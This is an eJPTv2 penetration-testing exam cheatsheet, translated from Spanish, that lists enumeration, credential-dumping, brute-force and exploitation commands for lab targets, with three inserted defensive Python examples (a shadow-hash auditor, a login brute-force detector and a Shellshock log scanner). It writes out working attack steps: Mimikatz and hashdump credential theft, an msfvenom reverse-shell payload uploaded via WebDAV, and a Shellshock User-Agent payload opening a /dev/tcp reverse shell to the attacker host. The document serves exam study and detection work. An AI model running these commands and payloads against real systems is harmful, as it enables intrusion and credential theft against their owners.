eJPTv2 Exam Cheatsheet

Translated from Spanish to English - www.onlinedoctranslator.com

Host & Network Auditing (min 80% = 8 right questions)

Transfer files to and from target (2):

ftp (put and get, ? for help)
scp (copy over SSH) SCP TUTORIAL
curl (HTTP, HTTPS, SCP, SFTP, FTP) CURL TUTORIAL
python3 -m http.server port
python3 -m SimpleHTTPServer port
wget (to download files) WGET TUTO
certutil and powershell (to download files) Powershell + certutil

List system info in target (2):

Linux:
uname -a (kernel, OS, hostname, processor)
cat /etc/issue (distro + version)
cat /etc/*release (distro + version, codename in parentheses)
env (to view environment variables)
lscpu (CPU info)
free -h (RAM usage)
df -h (list of hard drives and mounted drives)
df -ht ext4 (only lists ext4 filesystems)
lsblk | grep sd (list disks and filter by the "sd" prefix)
dpkg -l (list of packages installed on Debian and their versions)

Meterpreter:
getuid (to see the user)
sysinfo (hostname, OS and Service Pack, architecture, system language and domain or hostname, distro + release version, kernel and arch)
C:\Windows\system32\eula.txt (OS info, build number, service pack)
show_mount (to show all mounted drives)

Windows cmd:
hostname (PC name)
systeminfo (hostname, OS name, OS version, OS manufacturer, OS config, processor, Windows directory, system directory, boot device, keyboard and system languages, total physical memory (RAM), domain, logon server, hotfixes/updates, network card, Hyper-V)
wmic qfe get Caption,Description,HotFixID,InstalledOn (additional information about hotfixes/updates; important for the security updates related to privilege escalation)

Collect file information on target (2):

cat, bat, batcat, less, more, type

Collect account information on target (1):

Meterpreter:
getuid (current user, or user ID and group ID of the local user)
getprivs (current user privileges)
search logged_on (all information on users logged in now and recently, and their SIDs)

Linux:
whoami (current user)
groups (to view system groups)
groups xuser (to see the groups of xuser)
cat /etc/passwd (to see the system accounts; the user accounts at the end have a shell, "/bin/sh" or "/bin/bash")
last (last users legitimately logged into the system)
lastlog (users who logged into the system [SSH or legitimate])

Windows cmd:
whoami (current user)
whoami /priv (current user privileges)
query user (logged in users)
net users (all user accounts)
net user x (info on user x)
net localgroup (all groups in the system)
net localgroup xgroup (to see the users of group x)

Collect hash/password information from target (1):

You need to have privileges in all cases:

Meterpreter:
hashdump (Windows: pgrep lsass -> migrate PID_of_lsass -> hashdump)
kiwi -> help or ? -> creds_all (dump all hashed credentials) -> lsa_dump_sam (dumps all the users' NTLM credentials) -> lsa_dump_secrets (sometimes dumps creds in plain text) -> password_change (to change the password or hash of one user)

Linux:
cat /etc/shadow (with privileges)
$1$ -> MD5
$2$ -> Blowfish
$5$ -> SHA-256
$6$ -> SHA-512
search hashdump (post/linux/gather/hashdump)
Crack SHA-512 -> john --format=sha512crypt file.txt --wordlist=/absolutepath
hashcat -m 1800 -a 0 (or -a 3) file.txt /pathwordlist
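The $id$ prefixes above are what a defender uses to audit a shadow file, not just what an attacker uses to pick a cracking mode. The following added example (not part of the cheatsheet) classifies each account by hash algorithm and flags the entries worth reviewing first: MD5-hashed passwords, empty password fields, and unrecognised formats. The shadow content is a constructed sample with fake hash strings; reading the real file still requires root, as the note above says.

```python
import re

# crypt(3) hash identifiers as listed in the cheatsheet
HASH_IDS = {"1": "MD5", "2": "Blowfish", "5": "SHA-256", "6": "SHA-512"}
WEAK_ALGOS = {"MD5"}

# Constructed sample in /etc/shadow format (fake hashes, not real credentials)
SAMPLE_SHADOW = """\
root:$6$rounds=5000$saltsalt$Q9Yj.fakehashfakehashfakehashfakehashfakehash/:19000:0:99999:7:::
legacy:$1$abc$fakefakefakefakefakefak:18000:0:99999:7:::
svc:$5$abc$fakehashfakehashfakehashfakehashfakehashfak:19100:0:99999:7:::
bcryptuser:$2y$10$fakefakefakefakefakefakefakefakefakefakefakefakefakefa:19100:0:99999:7:::
daemon:*:18000:0:99999:7:::
locked:!$6$abc$fakehash:18000:0:99999:7:::
nopass::18000:0:99999:7:::
"""

PREFIX_RE = re.compile(r"^\$([0-9a-zA-Z]+)\$")


def classify_hash(field):
    """Return (algorithm, note) for one shadow password field."""
    if field == "":
        return "none", "empty password field: login possible without a password"
    if field.startswith(("*", "!")):
        return "locked", "account locked or has no usable password"
    m = PREFIX_RE.match(field)
    if not m:
        return "unknown", "unrecognised format (possibly legacy DES crypt)"
    ident = m.group(1)
    # "$2a$", "$2b$", "$2y$" are bcrypt variants, so fall back to the first character
    algo = HASH_IDS.get(ident) or HASH_IDS.get(ident[0], "unknown")
    if algo in WEAK_ALGOS:
        return algo, "weak hash algorithm; migrate to SHA-512 or bcrypt"
    if algo == "unknown":
        return algo, "unknown $id$; check ENCRYPT_METHOD in /etc/login.defs"
    return algo, "modern hash"


def audit_shadow(text):
    """Parse shadow-format text; return a list of (user, algorithm, note)."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        user, pw = fields[0], fields[1]
        algo, note = classify_hash(pw)
        findings.append((user, algo, note))
    return findings


def risky_accounts(text):
    """Accounts a reviewer should look at first: weak hashes or empty passwords."""
    return [u for u, algo, _ in audit_shadow(text) if algo in WEAK_ALGOS or algo == "none"]


if __name__ == "__main__":
    for user, algo, note in audit_shadow(SAMPLE_SHADOW):
        print(f"{user:<12} {algo:<9} {note}")
```

On a real host, run it as root against /etc/shadow and treat every account returned by risky_accounts as a finding: an MD5 entry means the password was set while ENCRYPT_METHOD was MD5 and will be re-hashed only when the user next changes it.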

Windows cmd:
Mimikatz -> help or ? -> privilege::debug (should say Privilege '20' OK) -> lsadump::sam (we get the syskey, SAMkey and RIDs [500 = admin]) -> lsadump::secrets -> sekurlsa::logonpasswords (to get the password in clear text if it is cached and available)
Crack NTLM -> john --format=NT file.txt --wordlist=/absolutepath
hashcat -m 1000 -a 0 (or -a 3) file.txt /pathwordlist
In a hashdump line, the 1st hash is LM and the 2nd is NTLM

List network information from the target (1):

Meterpreter:
ifconfig (IP address + interfaces + MAC + IPv4 + mask)
netstat (list active TCP/UDP services and their ports + other PCs in the network)
route (routing table; the gateway matters for pivoting)
arp (hosts connected to the network)

Linux:
ifconfig (network cards, MAC + IP + segment)
ip a (MAC, IP + segment)
cat /etc/networks (interfaces and their configuration)
cat /etc/hosts (hosts + local domains)
cat /etc/resolv.conf (default DNS server)
arp (hosts connected to the network)

Windows cmd:
ipconfig (network adapters, DNS suffix, IPv4 and IPv6 addresses, netmask and gateway)
ipconfig /all (hostname, IP routing enabled, MAC address, DHCP enabled [dynamic IPs], lease expiry, DHCP server, gateway, DNS server)
route print (routing table)
arp -a (all devices on the network, IP and MAC)
netstat -ano (protocols and ports of the services [0.0.0.0 entries belong to the host])
netsh firewall show state (firewall status)
netsh advfirewall firewall dump (dump the firewall configuration)
netsh advfirewall show allprofiles (whether the firewall is active or not)

Assessment Methodologies (min 90% = 9 correct)

Locate endpoints on the network (2):

Endpoints are physical devices that connect to and exchange information with a computer network. Some examples of endpoints are mobile devices, desktops, virtual machines, embedded devices and servers.

Identify vulnerabilities in services (1):

Scan services and versions with nmap
searchsploit (to search for exploits and vulnerabilities)
Nessus, OpenVAS
NATIONAL VULNERABILITIES DATABASE
nmap scripts: locate /usr/share/nmap/scripts | grep service
msf: db_autopwn (run db_nmap first, or the analyze command and then vulns)

Identify the OS of a target (1):

nmap -O
rpcclient -U "" -N IPobj -> srvinfo
smb-os-discovery (nmap script)
enum4linux -O IPobj
enum4linux -S IPobj
nc IPobj 22 (the SSH banner reveals the OS)

Identify open ports and services of a target (2):

nmap -sS -p- -n -Pn --open IPobj
nmap -sV -p 21,22,etc -n -Pn --open IPobj
metasploit (search portscan or db_nmap)

Extract company information from public sources (1):

There may be this type of information on the website:
robots.txt (hidden folders where there may be something)
Source code (there may be hidden things)
sitemap.xml/sitemaps.xml (makes it easier for the search engine to index the site)
whois xwebpage (to get information about the website: when it was registered, who the owner is, which hosting company it was registered with; CIDR = network range, OrgName = name of the organization)
Netcraft.com > services > internet data mining > internet research tools (combines whois, whether there is SSL or TLS, the web technologies used by the site, the names of the servers)
dnsrecon -d xpage.com (identifies the records for a particular domain; NS = name server addresses; MX = mail server address (the "mailman"); A = IPv4 address; AAAA = IPv6 address; TXT = text record)
dnsdumpster.com
sublist3r -d xpage.com (search for subdomains with OSINT)

Collect technical information from public sources (1):

There may be this type of information on the website:
whatweb -a=1 xpage.com (lists technologies, stealthy scan)
wafw00f xpage.com (you can add option -a)

Collect emails from public sources (1):

There may be this type of information on the website:
theHarvester -d xpage.com -b google,linkedin,yahoo,dnsdumpster,duckduckgo,crtsh (search for emails using OSINT; the emails found can be looked up in leaked password databases, since many users reuse the same password on several sites)
HaveIBeenPwned
Breach Directory (the best)

Evaluate information and criticality or impact of vulnerabilities (1):

NATIONAL VULNERABILITIES DATABASE
MITRE SEARCH CVE LIST
Nessus or OpenVAS
exploit-db or searchsploit
Google search for "CVE version service"
SCAP scan & STIG Viewer (scans the PC and automatically evaluates the vulnerabilities it has)

Host & Network Pentesting (min 70% = 7 correct)

Do hash cracking (2):

hashid or hash-identifier or hash-id.py (to identify hashes)
john (John the Ripper) JOHN SPANISH MANUAL
hashcat HASHCAT LIST HASHES AND EXAMPLES
crackstation (online hash cracker)

Identify and modify exploits (2):

searchsploit service version (to search for exploits)
searchsploit -m /path/example/46531.py (to copy an exploit locally)
To modify it use nano (change the fields/variables as needed)

Do brute-force password attacks (1):
with nmap scripts
with metasploit login modules (e.g. smb_login)
hydra (the best tool); -t 3 so as not to cause a DoS

Exploit with metasploit (1):

you know very well how to do it
service postgresql start && msfconsole

Demonstrate pivoting by adding a route (2):

(2nd notebook)
Meterpreter:
ipconfig or ifconfig (to see the network cards; add the route even if there is only one)
run autoroute -s 10.10.10.0/20 (example: the target network, i.e. the target IP with the host part set to 0, plus /netmask)
run autoroute -p (to list the routes)

Demonstrate pivoting by doing port forwarding (1):

(2nd notebook)
Meterpreter:
portfwd add -l 1234 -p 80 -r IPobj2 (where -l is the local port Kali listens on to reach target 2, -p is the target port on IPobj2, and -r is IPobj2)
then nmap the forwarded port: nmap -sV -p 1234 localhost

Web Application Pentesting (min 60% = 5 correct)

Do webapp reconnaissance (3):
Source code (there may be hidden things)
whatweb (to see the technologies used and whether it is vulnerable to something)
wafw00f page.com (you can add -a)
http IP or domain (to dump the headers of a website)
browsh --startup-url http://IPobj/Default.aspx (enumerates the website at the URL we pass; renders the page in the terminal, Control + W to exit)
browsh --startup-url IPobj (to view the web page in the console)
curl IPobj | more (DocType html; title Apache 2 Ubuntu) = wget "http://IPobj/index" -> cat index | more
curl http://IPobj/example | more (useful for viewing access permissions)
lynx http://IPobj (to see the source code)
davtest (used to scan, authenticate to and exploit a WebDAV server)
cadaver (allows uploading and downloading files, on-screen display, in-place editing, moving, copying, creating and deleting collections, manipulating ownership and locking resources on WebDAV servers)

Do brute-force login attack (1):

LOGIN FORM (see source code):
hydra -L userwordlist -P passwordlist IPobj http-post-form "/login.php:login=^USER^&password=^PASS^&security_level=0&form=submit:Invalid credentials" -t 3 (where /login.php is the page with the login form; login is the user variable; password is the password variable; security_level is another form variable of the login [may not exist, look at the source code]; form is the login button, which says submit; and :Invalid credentials is the error it shows if the credentials are not correct)
BASIC AUTH [pop-up] (with BurpSuite): (it is at the end of the second notebook)
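The form attack above leaves an obvious trace: many POSTs to the same login path from one client in a short window. The added example below (not part of the cheatsheet) is the detection side of it, a sliding-window counter over Apache combined-format access log lines. The log lines, the login path /login.php and the threshold of 10 POSTs per 60 seconds are constructed assumptions for the example; tune them to the application.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache combined log format: ip ident user [timestamp] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
LOGIN_PATHS = {"/login.php"}   # assumed login endpoint(s)
THRESHOLD = 10                 # assumed alert threshold
WINDOW_SECONDS = 60


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "ts": ts, "method": m.group("method"),
            "path": m.group("path"), "status": int(m.group("status"))}


def detect_bruteforce(lines, login_paths=LOGIN_PATHS, threshold=THRESHOLD, window=WINDOW_SECONDS):
    """Return {client_ip: max POSTs to a login path inside any `window`-second span}
    for every client that reached `threshold`."""
    attempts = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and ev["method"] == "POST" and ev["path"].split("?", 1)[0] in login_paths:
            attempts[ev["ip"]].append(ev["ts"])
    alerts = {}
    for ip, times in attempts.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            # shrink the window from the left until it spans at most `window` seconds
            while (t - times[start]).total_seconds() > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                alerts[ip] = max(alerts.get(ip, 0), count)
    return alerts


def _sample_logs():
    """Constructed sample: 12 login POSTs in 12 seconds from one client,
    two normal logins from another, and an unrelated GET."""
    lines = [
        f'10.0.0.5 - - [10/Oct/2023:13:55:{i:02d} +0000] "POST /login.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"'
        for i in range(12)
    ]
    lines.append('10.0.0.9 - - [10/Oct/2023:13:55:03 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"')
    lines.append('10.0.0.9 - - [10/Oct/2023:13:58:40 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"')
    lines.append('10.0.0.5 - - [10/Oct/2023:13:55:30 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"')
    return lines


SAMPLE_LOGS = _sample_logs()

if __name__ == "__main__":
    for ip, count in detect_bruteforce(SAMPLE_LOGS).items():
        print(f"ALERT {ip}: {count} login POSTs within {WINDOW_SECONDS}s")
```

The counter deliberately ignores the HTTP status: a form that answers 200 on failure (the "Invalid credentials" case above) and 302 on success looks the same to the rate logic, which is what makes it robust against applications that do not return distinct failure codes.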

Locate hidden files and directories (1):

robots.txt (hidden folders where there may be something)
sublist3r -d page.com (list subdomains)
dirb http://IPoDOMAIN
gobuster dir --url http://IPoDOMAIN/ --wordlist /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt

Identify vulnerabilities in webapps (2):

NIKTO: NIKTO WEB APP VULN SCAN TUTORIAL
WPscan (wordpress scan): WP SCAN USER DOCUMENTATION
whatweb (to see the technologies used and whether it is vulnerable to something)
msf meterpreter: wmap
SQLi (SQL injection)
XSS (cross site scripting)
File inclusion (upload files)
Access to restricted URLs (e.g. forging the User-Agent, see robots.txt)
Path traversal (/../../../../../../../../../)
Command injection (the interpreter runs system commands like whoami, cat, etc.)
.asp .aspx .php .config files (vulnerabilities that allow uploading a reverse shell)

EXTRA:

DNS Zone Transfer (notebook 1, Topic 1, Point 1.3)
traceroute (follows the path a packet takes from the source to the destination)
ping (checks if a host is up; it may have ICMP responses turned off)
arp-scan -I eth0 -g IP/segment (scans network hosts through the given network interface; -g ignores duplicate packets)
fping -I eth0 -g IP/segment -a 2>/dev/null (ping sweep of the network's hosts; -g generates the target list and -a only outputs active hosts)

SMB enum:

1. NMAP SCRIPTS:

--script smb-enum-users (PC users)
--script smb-protocols (SMB version)
--script smb-security-mode (user and privileges)
--script smb-enum-sessions (name of the user with an open session)
--script smb-enum-shares (what the service shares)
--script smb-os-discovery (OS and Samba version; it gives us the user name [computer name] and the NetBIOS computer name)
--script smb-enum-sessions --script-args smbusername=administrator,smbpassword=passwordadmin IP (with those arguments we try to open a session, if it works)
--script smb-enum-shares --script-args smbusername=administrator,smbpassword=passwordadmin IP (to see permissions and shared folders, very useful)
--script smb-enum-users --script-args smbusername=administrator,smbpassword=passwordadmin IP (PC users + flags)
--script smb-server-stats --script-args smbusername=administrator,smbpassword=passwordadmin IP (to see how much data has been sent and received, how many logins have failed, permission errors, system errors, printer jobs, open files)
--script smb-enum-domains --script-args smbusername=administrator,smbpassword=passwordadmin IP (to view users, password info, complexity requirements, and everything that applies to groups)
--script smb-enum-groups --script-args smbusername=administrator,smbpassword=passwordadmin IP (divides users into their groups)
--script smb-enum-services --script-args smbusername=administrator,smbpassword=passwordadmin IP (lists the services in use and their details)
--script smb-enum-shares,smb-ls --script-args smbusername=administrator,smbpassword=passwordadmin IP (lists the shares and what is in those directories [ls])

2. SMBMAP

smbmap -u guest -p "" -d . -H IPobj (where -u is the Samba user, -p the password, -d the directory we are in, and -H the target host)
smbmap -u administrator -p passadmin -d . -H IPobj (to see the administrator's permissions)
smbmap -H IPobj -u administrator -p passadmin -x 'ipconfig' (if this command works we can do remote code execution)
smbmap -H IPobj -u administrator -p 'passadmin' -L (lists the contents of the shared directories)
smbmap -H IPobj -u administrator -p 'passadmin' -r 'C$' (list the contents of one specific share, C$ in this case)
smbmap -H IPobj -u administrator -p 'passadmin' --upload '/path/localfile' 'C$\backdoor' (to upload a file [for example a backdoor]; once uploaded, run the previous command again to confirm it is there)
smbmap -H IPobj -u administrator -p 'passadmin' --download 'C$\flag.txt' (to download specific files to our machine)

3. nmblookup

nmblookup -h
nmblookup -A IPobj (shows the different groups and their roles; among the connections [in <number>], a <20> means that we can connect to the server)

4. Metasploit enum
SMB 1: use auxiliary/scanner/smb/smb_version (Windows and Samba version)
SMB 2: use auxiliary/scanner/smb/smb2 (to see if it supports SMB2)
SMB 3: use auxiliary/scanner/smb/smb_enumshares (enumerate shares and which are readable and writable, share types, directories, files, timestamps, etc.)

5. enum4linux

enum4linux -h
enum4linux -S IPobj (list of users, workgroup name, whether null sessions are allowed, the domain SID and OS info)
enum4linux -O IPobj (usernames, workgroup name, whether null sessions are allowed, the domain SID, the OS information)
enum4linux -U IPobj (shows the list of PC users)
enum4linux -G IPobj (list of groups [each has different permissions and can do different things; a user may not have access directly but be in a group that does])
enum4linux -i IPobj (to see if there are printers and list them)

6. CONNECTING TO SMB

smbclient -h
smbclient -L IPobj -N (using a null session, enumerate the shares; if there is an IPC$ we could connect)
smbclient //IPobj/Public -N (connect to SMB as the user Public, which has write permissions)
smbclient //IP/share -U user (to connect to an SMB share as user x [try the username "Anonymous" without a password])

An RSA private key (id_rsa) needs permissions 600 (chmod 600 file)

Now we can attempt to ssh into the main server! Before that, check the id_rsa.pub file to find the username at the end of the file.

ssh user@$ip -i id_rsa

Quick troubleshooting:

● Load key "/home/kali/.ssh/id_rsa": bad permissions: revisit the chmod step
● load pubkey "/home/kali/.ssh/id_rsa": invalid format: download/copy the public key into .ssh, or generate it with
ssh-keygen -y -f rsa_id > rsa_id.pub

CONNECTING TO RPC

rpcclient -h
rpcclient -U "" -N IPobj (once the session is open, run ? to see the command help)
inside rpcclient: srvinfo (shows the OS version); enumdomusers (shows the list of PC users); lookupnames admin (shows the SID of admin, in this case); enumdomgroups (shows the PC groups)

SSH:

nc IPobj sshport (shows the SSH version and the OS)

nmap SSH scripts:
ssh2-enum-algos (lists the algorithms the SSH 2 server supports, usually RSA for host keys)
ssh-hostkey --script-args ssh_hostkey=full (gives us the server's full RSA host key)
ssh-auth-methods --script-args="ssh.user=xuser" (to see whether xuser has weak authentication in SSH [whether password authentication is allowed, or public key (id_rsa) and password])

HTTP:

whatweb IPobj (to see the technologies used on the website)
http IPobj (makes a request to the web page and prints the headers; here you can spot some vulnerable file being executed)
dirb http://IPobj (directory and subdirectory enumeration)
browsh --startup-url http://IPobj/Default.aspx (website enumeration at the URL we pass; renders the web page in the terminal, Control + W to exit)
lynx http://IPobj (to see the web page as text)
curl IPobj | more (Doctype html; title Apache2 Ubuntu) = wget "http://IPobj/index" -> cat index | more (to see the source code of the website)
robots.txt (to see disallowed folders and be able to impersonate a user-agent to access them)
curl http://IPobj/cgi-bin | more (error 403 forbidden = useful for later exploitation)

nmap scripts:
http-enum (shows common but interesting directories)
http-headers (shows the headers of a request to that website and whether it is vulnerable to XSS [X-XSS-Protection: 0]; X-Powered-By: ASP.NET)
http-methods --script-args http.methods.url-path=/directory/ (shows the request methods a web directory supports)
http-webdav-scan --script-args http-webdav-scan.path=/webdav/ (helps identify WebDAV installations, useful)

SQL (port 1433/3306 TCP)

MySQL:

Connection to MySQL:
mysql -h IPobj -u root (-h is the host and -u the user we authenticate as)
Once in:
show databases; -> use xdatabase; -> select count(*) from xtable; (shows how many rows xtable has) -> select * from xtable; (to see all of xtable's rows) -> help (to see options)
USEFUL: select load_file("/etc/shadow"); (to see if we can read the Linux shadow file)

Metasploit:
search mysql_writable_dirs (to view directories with write permission)
search mysql_hashdump (gives us the user hashes to crack later)

nmap scripts:
--script=mysql-empty-password (to see if we can connect without a password)
--script=mysql-info (tells us the version and some capabilities; if we find InteractiveClient we get interactive access to the system through MySQL)
--script=mysql-users --script-args="mysqluser='root',mysqlpass=''" (lists the users of the victim PC)
--script=mysql-databases --script-args="mysqluser='root',mysqlpass=''" (lists the databases on the server/PC)
--script=mysql-variables --script-args="mysqluser='root',mysqlpass=''" (prints the MySQL variables; datadir tells you where the data is stored on the PC)
--script=mysql-audit --script-args="mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename=/usr/share/nmap/nselib/data/mysql-cis.audit" (audits the MySQL properties [configs]; in this case it does not grant privileges to non-admin users = PASS)
--script=mysql-dump-hashes --script-args="mysqluser='root',mysqlpass=''" (shows the hashes of the users of the victim PC)
--script=mysql-query --script-args="query='select count(*) from books.authors;',username='root',password=''" (to run queries against MySQL)

MSSQL (Microsoft SQL):

nmap scripts:
ms-sql-info (service info)
ms-sql-ntlm-info --script-args mssql.instance-port=1433 (info on the authentication protocol)
ms-sql-brute --script-args userdb=/common_users.txt,passdb=/100-common-passwords.txt (note the users and passwords found)
ms-sql-empty-password (info on users who do not have a password)
ms-sql-query --script-args mssql.username=admin,mssql.password=pass,ms-sql-query.query="SELECT * FROM master..syslogins" -oN output.txt (run queries with the credentials obtained)
ms-sql-dump-hashes --script-args mssql.username=admin,mssql.password=pass (to dump the PC accounts and their hashes)
ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=pass,ms-sql-xp-cmdshell.cmd='ipconfig' (try remote command execution)
ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=pass,ms-sql-xp-cmdshell.cmd="type C:\flag.txt" (the same, but to read text files like flags)

Metasploit:
search mssql_login -> configure options -> set verbose false -> run (brute-forces users and passwords)
search mssql_enum (to get the MSSQL config information)
search mssql_enum_sql_logins (dumps the logins that exist on MSSQL)
search mssql_exec (remote command execution)
search mssql_enum_domain_accounts (lists domain accounts)

Exploitation:

Windows:
Microsoft IIS + WebDAV: (port 80/443)
Can run .asp .aspx .config and .php files
davtest (used to scan, authenticate to and exploit a WebDAV server)
davtest -url http://IPobj/webdav (the service exists but we do not use creds)
davtest -auth user:pass -url http://IPobj/webdav (this tells you which file types we can upload and execute)
cadaver (allows uploading and downloading files, on-screen display, in-place editing, moving, copying, creating and deleting collections, manipulating ownership and locking resources on WebDAV servers)
cadaver --help
cadaver http://IPobj/webdav (and enter credentials); in another terminal: ls -al /usr/share/webshells (asp in this case); then in cadaver: put /usr/share/webshells/asp/webshell.asp (configure it if necessary)
We return to the web browser, open the file, and obtain the web shell where we can execute commands.

Microsoft IIS + WebDAV METASPLOIT:

Method 1:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IPkali LPORT=openport -f asp > shell.asp (we build a reverse shell payload)
then cadaver http://IPobj/webdav, enter credentials and upload the shell generated by msfvenom with put
open metasploit: service postgresql start && msfconsole -> use multi/handler -> set payload windows/meterpreter/reverse_tcp (configure it like the msfvenom payload), listen, and open the malicious file from the web page to get the reverse shell.
Method 2:
search iis upload -> use 1 -> show options and configure it as necessary -> set path /webdav/metasploit.asp -> exploit

Exploiting SMB with PsExec:

To use PsExec we need user credentials: user and password or hash
use: psexec.py user@IPobj cmd.exe (like SSH)

For a meterpreter:
search psexec -> use 10 (exploit/windows/smb/psexec) -> set it up as needed and launch it.

EternalBlue: you already know how to exploit it. MS17-010 and CVE-2017-0144

Exploiting RDP: (normally 3389 TCP)

Requires a user account of the target and their password in plain text.
run metasploit rdp_scanner (to get the RDP version)
then brute force it to get credentials (better if they are privileged)
xfreerdp /u:user /p:password /v:IPobj:RDPport (to connect via RDP to the victim with legitimate credentials)

BlueKeep: CVE-2019-0708:
METASPLOIT: search bluekeep (use the auxiliary to see if it is vulnerable)
then search bluekeep -> use 1 (only works on x64) -> show options (configure what is necessary) -> show targets (choose the suitable one)

Exploiting WinRM: (5985 TCP and 5986 HTTPS)

Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Remote administration protocol that can be used to facilitate remote access to Windows over HTTPS

Exploitation:
crackmapexec (to see all the help)
crackmapexec winrm IPobj -u administrator -p /wordlistpass (to get privileged user credentials; administrator always exists on Windows)
crackmapexec winrm IPobj -u administrator -p pass -x "whoami" (to test remote command execution)
evil-winrm(.rb) -u administrator -p 'passadmin' -i IPobj (to get a shell on the victim)

METASPLOIT:
search winrm_script_exec -> use 0 -> show options (and configure) -> set force_vbs true -> set username and password -> exploit (it may not work, try several times)

Linux:

Shellshock: (CVE-2014-6271)
The Shellshock vulnerability is due to a bug in bash: bash mistakenly executes commands that follow the character sequence () { :;};
Apache servers configured to run .cgi or .sh scripts are vulnerable to this attack.
To exploit this vulnerability, a script must be located that communicates with bash.
In the context of an Apache web server we can use any .cgi script accessible from the web server.
Shellshock exploitation:
We connect from the web browser to the Apache server's web page.
We view the source code: in the <script> part we see that it calls a .cgi file, which is saved in the server's root folder and is accessible; we open the script's URL, e.g. IPobj/gettime.cgi
We check if it is vulnerable with: nmap -sV IPobj --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" (reports whether it is vulnerable)
Manual exploitation:
with burpsuite we intercept the page IPobj/script.cgi -> right click -> send to repeater -> we replace the User-Agent with: () { :;}; echo; echo; /bin/bash -c 'cat /etc/passwd' -> send, and the response contains the output of the executed command
Manual reverse shell:
nc -nlvp port
We return to the repeater in burpsuite and change the User-Agent to: () { :;}; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/IPkali/LPORT 0>&1' and we have the reverse shell
Metasploit:
search shellshock -> use 5 (exploit/multi/http/apache_mod_cgi_bash_env_exec) -> show options -> set targeturi script.cgi -> exploit
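The trigger string above is also the signature a defender matches on: a bash function definition "() {" followed by a brace group and ";" in a request header. The added example below (not part of the cheatsheet) checks individual request headers and Apache combined-format access log lines for that pattern, so a probe like the User-Agent injection described above shows up in the web logs. The requests and log lines are constructed samples; the regex is deliberately loose about whitespace because probes vary between "() { :;};" and "() { :; };".

```python
import re

# bash function-definition prefix: "()" then a brace group then ";" before commands.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{[^}]*\}\s*;")


def is_shellshock_probe(value):
    """True when a header value carries the CVE-2014-6271 trigger pattern."""
    return bool(SHELLSHOCK_RE.search(value))


def scan_headers(headers):
    """Return the names of headers in one request that carry the pattern."""
    return [name for name, value in headers.items() if is_shellshock_probe(value)]


def scan_access_log(lines):
    """Apache combined log: the User-Agent is the last quoted field.
    Return (client_ip, user_agent) for lines whose User-Agent carries the pattern."""
    hits = []
    for line in lines:
        quoted = re.findall(r'"((?:[^"\\]|\\.)*)"', line)
        if not quoted:
            continue
        user_agent = quoted[-1]
        if is_shellshock_probe(user_agent):
            hits.append((line.split(" ", 1)[0], user_agent))
    return hits


# Constructed samples: one probe in User-Agent, one in Cookie, one clean request
SAMPLE_REQUESTS = [
    {"Host": "target", "User-Agent": "() { :;}; echo; echo; /bin/bash -c 'id'"},
    {"Host": "target", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64)", "Cookie": "() { :; }; /usr/bin/id"},
    {"Host": "target", "User-Agent": "curl/7.88.1", "Referer": "http://example.org/{}"},
]
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Sep/2014:10:01:02 +0000] "GET /cgi-bin/gettime.cgi HTTP/1.1" 200 45 "-" "() { :;}; /bin/bash -c \'id\'"',
    '198.51.100.2 - - [24/Sep/2014:10:01:05 +0000] "GET /cgi-bin/gettime.cgi HTTP/1.1" 200 45 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for i, headers in enumerate(SAMPLE_REQUESTS):
        print(f"request {i}: flagged headers {scan_headers(headers)}")
    for ip, ua in scan_access_log(SAMPLE_LOG):
        print(f"log hit from {ip}: {ua}")
```

Detection is the second line of defence; the fix is a patched bash (the CVE-2014-6271 and follow-up patches stop the trailing-command parse entirely), and any CGI script that still runs under bash should be treated as exposed until that patch is confirmed.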

Extract a .tar.gz file -> tar xzf file.tar.gz

Privilege Escalation:

Windows:
Kernel exploit:
after getting a meterpreter and not being able to do getsystem:
search suggester (this post-exploitation module shows the vulns and the metasploit modules that can be used to elevate privileges) -> select the one you want, configure it and launch it

Manual:
go back to meterpreter -> shell -> systeminfo -> copy the output to a text file -> Control+C to go back to meterpreter -> open another terminal and create a text file with nano and paste the previous information. Go to the windows-exploit-suggester folder -> run the python script with --update -> then ./windows-exploit-suggester.py --database <the database just created> --systeminfo <the text file above> (the exploits listed first are more likely to work)
Log back in with the unprivileged meterpreter and go to the Temp folder -> upload /path/to/the/chosen/exploit -> shell -> .\exploit.exe 7 (where 7 is the OS version, Windows 7) -> we get a new shell with all the privileges.
UAC Bypass with UACme:
See the UACme github repo for the technique suited to the OS:
We have access to a Windows machine with a user account in the local Administrators group -> cmd -> net users (the current account is IEUser) -> net localgroup administrators -> opening cmd as admin bypasses UAC.

In meterpreter:
